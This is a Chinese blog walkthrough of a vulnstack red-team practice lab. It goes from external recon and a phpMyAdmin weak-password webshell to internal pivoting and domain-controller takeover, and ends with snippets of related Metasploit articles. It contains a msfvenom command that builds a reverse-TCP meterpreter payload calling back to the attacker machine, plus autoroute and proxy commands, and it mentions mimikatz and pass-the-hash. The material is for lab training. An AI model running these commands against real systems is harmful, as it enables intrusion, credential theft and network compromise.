ATT&CK红队实战靶场初探(一)

VSole2021-07-23 17:00:18

一、环境配置

靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2

攻击示意图:

靶机统一使用虚拟机搭建

  • web服务器:windows7 ip:192.168.52.143/192.168.154.152
  • 域成员:windows server 2003 ip:192.168.52.141
  • 域控:windows server 2008 ip:192.168.52.138
  • 攻击机:kali ip:192.168.154.146

二、外网打点

nmap扫描ip,看一下开了哪些端口

开了80和3306,访问80

是个探针,知道网站路径和php版本信息

上dirsearch扫一下目录

有phpMyAdmin

试下弱口令,root/root进去了

然后就是getshell,这里参考:https://cloud.tencent.com/developer/article/1540506,用的是日志getshell




写完shell蚁剑连上去,成功getshell

三、内网渗透

1、用msf生成exe上线,联动cs

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.154.146 LPORT=4444 -f exe -o shell.exe

msf设置


通过蚁剑上传木马,执行

成功得到session

打开cs,设置监听器

在msf中使用exploit/windows/local/payload_inject模块,session设置为刚获得的session

set payload windows/meterpreter/reverse_http


执行,cs成功上线

2、信息收集

(1)mimikatz提取账号明文密码

(2)post/windows/gather/enum_applications模块获取软件列表

(3)get_local_subnets获取子网信息+内网流量转发(msf+proxychains)

获得内网网段为192.168.52.0/24


run autoroute -s 192.168.52.0/24


添加路由让msf可以扫描网段



msf运行socks4a模块,并且修改/etc/proxychains.conf的最后一行为相对应的代理端口

(4)arp扫描内网存活主机

(5)PTH攻击拿下域控



msf
本作品采用《CC 协议》,转载必须注明作者和本文链接
msf提权简单利用
2023-06-06 09:03:11
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。将创建的用户添加到远程连接组net localgroup Administrators username /add 将创建的用户添加到管理员组然后即可通过远程登录进入本机进行远程连接至此实验成功!
0x00写在前面本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!很快会被检测发现,防守方对攻击流量回溯分析,就会阻断攻击行为。针对加密流量的检测,传统的基于特征的检测已经无法满足攻击发展的趋势,只有通过不断引入新的检测思考才能解决。
MSF+生成流量免杀木马
2022-01-14 11:34:16
在实战中,即便你绕过了杀毒软件的检测,也很有可能会结束在某些流量监控的设备上。MSF可以说其是每一个内网玩家的必用工具。理所当然,这款工具也自然而然地被各大安全厂商分析,捕捉其在命令执行时产生的数据和流量。当我们使用一个没有做过加密处理的原版工具时,内网中的安全设备会根据我们的流量特征进行判断,认定我们为恶意进程,从而导致控制中断。Meterpreter技巧生成后门msfvenom?
MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击者可以利用此会话完成攻击控制靶机。
生成PayloadMetasploit,输出c、py格式,可用xor、xor_dynamic、zutto_dekiru编码器。CobaltStrike,这里选择使用x64的C语言或Python语言的Shellcode。
192.168.102.16目标主机系统:win7 192.168.102.17两台主机均在虚拟机,同一局域网内互通。
msf是一个免费框架,可用命令生成一个可监听的木马程序。
MSF监听设置use?PAYLOAD?name>set?LHOST?192.168.20.128set?LPORT?4444show?options?#查漏补缺exploit
在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。
MSF生成绑定证书后门msfvenom?
VSole
网络安全专家